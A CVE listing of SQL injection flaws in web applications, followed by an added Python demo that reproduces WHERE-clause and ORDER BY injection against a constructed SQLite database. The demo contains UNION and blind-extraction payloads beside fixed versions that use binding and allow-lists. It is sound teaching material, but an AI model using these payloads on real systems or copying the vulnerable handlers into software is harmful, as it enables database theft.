Total: 9311 CVE
CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 | Description |
---|---|---|---|---|---|---|
CVE-2020-5510 | 1 Phpgurukul | 1 Hostel Management System | 2020-01-10 | 10.0 HIGH | 9.8 CRITICAL | PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file. |
CVE-2013-3932 | 1 Jomres | 1 Jomres | 2020-01-09 | 6.5 MEDIUM | 8.8 HIGH | SQL injection vulnerability in the Jomres (com_jomres) component before 7.3.1 for Joomla! allows remote authenticated users with the "Business Manager" permission to execute arbitrary SQL commands via the id parameter in an editProfile action to administrator/index.php. |
CVE-2020-5307 | 1 Phpgurukul Dairy Farm Shop Management System Project | 1 Phpgurukul Dairy Farm Shop Management System | 2020-01-09 | 7.5 HIGH | 9.8 CRITICAL | PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. |
CVE-2019-7478 | 1 Sonicwall | 1 Global Management System | 2020-01-09 | 7.5 HIGH | 9.8 CRITICAL | A vulnerability in SonicWall GMS allows an unauthenticated user to perform SQL injection in the Webservice module. This vulnerability affects GMS versions 8.4, 8.5, 8.6, 8.7, 9.0 and 9.1. |
CVE-2019-20337 | 1 Advanced Real Estate Script Project | 1 Advanced Real Estate Script | 2020-01-09 | 6.5 MEDIUM | 7.2 HIGH | In PHP Scripts Mall advanced-real-estate-script 4.0.9, the news_edit.php news_id parameter is vulnerable to SQL injection. |
CVE-2019-19732 | 1 Mfscripts | 1 Yetishare | 2020-01-08 | 6.5 MEDIUM | 7.2 HIGH | translation_manage_text.ajax.php and various *_manage.ajax.php scripts in MFScripts YetiShare 3.5.2 through 4.5.3 directly insert values from the aSortDir_0 and/or sSortDir_0 parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL injection. |
CVE-2019-15985 | 1 Cisco | 1 Data Center Network Manager | 2020-01-08 | 9.0 HIGH | 7.2 HIGH | Multiple vulnerabilities in the REST and SOAP API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to execute arbitrary SQL commands on an affected device. To exploit these vulnerabilities, an attacker would need administrative privileges on the DCNM application. For more information about these vulnerabilities, see the Details section of the Cisco advisory. Note: The severity of these vulnerabilities is aggravated by the vulnerabilities described in the Cisco Data Center Network Manager Authentication Bypass Vulnerabilities advisory, published simultaneously with this one. |
CVE-2014-8673 | 1 Soplanning | 1 Soplanning | 2020-01-08 | 7.5 HIGH | 9.8 CRITICAL | Multiple SQL injection vulnerabilities exist in planning.php, user_list.php, projets.php, user_groupes.php, and groupe_list.php in Simple Online Planning (SOPlanning) before 1.33. |
CVE-2017-18514 | 1 Simplerealtytheme | 1 Simple Login Log | 2020-01-07 | 7.5 HIGH | 9.8 CRITICAL | The simple-login-log plugin before 1.1.2 for WordPress has SQL injection. |
CVE-2019-19734 | 1 Mfscripts | 1 Yetishare | 2020-01-07 | 6.5 MEDIUM | 8.8 HIGH | _account_move_file_in_folder.ajax.php in MFScripts YetiShare 3.5.2 directly inserts values from the fileIds parameter into a SQL string. This allows an attacker to inject their own SQL and manipulate the query, typically extracting data from the database, aka SQL injection. |
CVE-2015-5591 | 1 Zenphoto | 1 Zenphoto | 2020-01-06 | 6.5 MEDIUM | 7.2 HIGH | SQL injection vulnerability in Zenphoto before 1.4.9 allows remote administrators to execute arbitrary SQL commands. |
CVE-2019-6012 | 1 Tms-outsource | 1 Wpdatatables Lite | 2020-01-03 | 6.5 MEDIUM | 7.2 HIGH | SQL injection vulnerability in wpDataTables Lite version 2.0.11 and earlier allows remote authenticated attackers to execute arbitrary SQL commands via unspecified vectors. |
CVE-2019-17527 | 1 Joomsky | 1 Js Jobs | 2020-01-02 | 7.5 HIGH | 9.8 CRITICAL | dataForDepandantField in models/custormfields.php in the JS JOBS FREE extension before 1.2.7 for Joomla! allows SQL injection via the child parameter of index.php?option=com_jsjobs&task=customfields.getfieldtitlebyfieldandfieldfo. |
CVE-2019-7484 | 1 Sonicwall | 2 Sma 100, Sma 100 Firmware | 2019-12-31 | 4.0 MEDIUM | 6.5 MEDIUM | Authenticated SQL injection in SonicWall SMA100 allows a user to gain read-only access to unauthorized resources using the viewcacert CGI script. This vulnerability affects SMA100 version 9.0.0.3 and earlier. |
CVE-2019-18234 | 1 Equinoxce | 1 Control Expert | 2019-12-30 | 7.5 HIGH | 9.8 CRITICAL | All versions of Equinox Control Expert are vulnerable to an SQL injection attack, which may allow an attacker to remotely execute arbitrary code. |
CVE-2019-19850 | 1 Typo3 | 1 Typo3 | 2019-12-20 | 6.5 MEDIUM | 7.2 HIGH | An issue was discovered in TYPO3 before 8.7.30, 9.x before 9.5.12, and 10.x before 10.2.2. Because escaping of user-submitted content is mishandled, the class QueryGenerator is vulnerable to SQL injection. Exploitation requires having the system extension ext:lowlevel installed, and a valid backend user who has administrator privileges. |
CVE-2016-1000113 | 1 Huge-it | 1 Gallery | 2019-12-19 | 7.5 HIGH | 9.8 CRITICAL | XSS and SQL injection in Huge-IT Gallery v1.1.5 for Joomla!. |
CVE-2019-19846 | 1 Joomla | 1 Joomla! | 2019-12-18 | 7.5 HIGH | 9.8 CRITICAL | In Joomla! before 3.9.14, the lack of validation of configuration parameters used in SQL queries caused various SQL injection vectors. |
CVE-2018-7282 | 1 Titool | 1 Printmonitor | 2019-12-18 | 7.5 HIGH | 9.8 CRITICAL | The username parameter of the TITool PrintMonitor solution, as sent in the login request, is vulnerable to blind SQL injection, including time-based blind SQLi. |
CVE-2009-5026 | 2 Mysql, Oracle | 2 Mysql, Mysql | 2019-12-17 | 6.8 MEDIUM | N/A | The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments. |
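Two shapes of SQL injection recur in the records above: a numeric id parameter pasted into a WHERE clause (the full-profile.php, editProfile and news_edit.php entries) and a client-supplied sort direction pasted into ORDER BY (the aSortDir_0 / sSortDir_0 entry). The Python below is an added example, not code from the CVE database page or from any product it lists. It reproduces both shapes against an in-memory SQLite database, shows the data extraction the YetiShare record describes as a boolean-based blind loop, and puts the hardened form of each handler beside the vulnerable one. The table and column names, the users rows and the secrets row are all constructed for the demo.

```python
"""
Added example: the two SQL injection shapes from the CVE list, vulnerable and
fixed, against an in-memory SQLite database. Schema and data are constructed.
"""
import sqlite3
import string


def build_db() -> sqlite3.Connection:
    # Constructed sample data: a users table the application queries and a
    # secrets table an attacker wants to read through the same query.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, value TEXT);
        INSERT INTO secrets VALUES (1, 'admin-password-hash');
        """
    )
    return conn


# --- shape 1: id parameter concatenated into WHERE -------------------------

def profile_vulnerable(conn, user_id: str) -> list:
    # The request parameter becomes SQL text, so an input such as
    # "1 UNION SELECT id, value FROM secrets" is parsed as part of the query.
    return conn.execute(
        "SELECT id, name FROM users WHERE id = " + user_id
    ).fetchall()


def profile_fixed(conn, user_id: str) -> list:
    # Check the shape, then bind the value: bound parameters are never parsed.
    if not user_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, name FROM users WHERE id = ?", (int(user_id),)
    ).fetchall()


# --- shape 2: sort direction concatenated into ORDER BY --------------------

def listing_vulnerable(conn, sort_dir: str) -> list:
    # DataTables-style handler: the client says which way to sort.
    return conn.execute(
        "SELECT id, name FROM users ORDER BY name " + sort_dir
    ).fetchall()


ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def listing_fixed(conn, sort_dir: str) -> list:
    # Keywords and identifiers cannot be bound as parameters, so the input
    # is mapped onto a fixed set of literals and anything else is rejected.
    direction = ALLOWED_DIRECTIONS.get(sort_dir.lower())
    if direction is None:
        raise ValueError("sort direction must be asc or desc")
    return conn.execute(
        "SELECT id, name FROM users ORDER BY name " + direction
    ).fetchall()


def extract_secret_blind(conn, max_len: int = 64) -> str:
    # Boolean-based blind extraction through listing_vulnerable(): the
    # injected LIMIT yields 1 row when the guessed character is right and
    # 2 rows otherwise, so every request answers one yes/no question.
    alphabet = string.ascii_lowercase + string.digits + "-_"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "ASC LIMIT (SELECT CASE WHEN substr(value, %d, 1) = '%s' "
                "THEN 1 ELSE 2 END FROM secrets WHERE id = 1)" % (pos, ch)
            )
            if len(listing_vulnerable(conn, payload)) == 1:
                recovered += ch
                break
        else:
            break  # no character matched: end of the value reached
    return recovered


if __name__ == "__main__":
    db = build_db()
    print(profile_vulnerable(db, "1 UNION SELECT id, value FROM secrets"))
    print(extract_secret_blind(db))
    for bad in ("1 UNION SELECT id, value FROM secrets", "ASC LIMIT 1"):
        try:
            profile_fixed(db, bad) if bad[0].isdigit() else listing_fixed(db, bad)
        except ValueError as exc:
            print("rejected:", exc)
```

The point of the second shape is that parameter binding alone does not close it: a bound `?` can carry a value, not the `ASC`/`DESC` keyword or a column name, so handlers that let the client choose sort column or direction need an allow-list, which is what the fixed listing does.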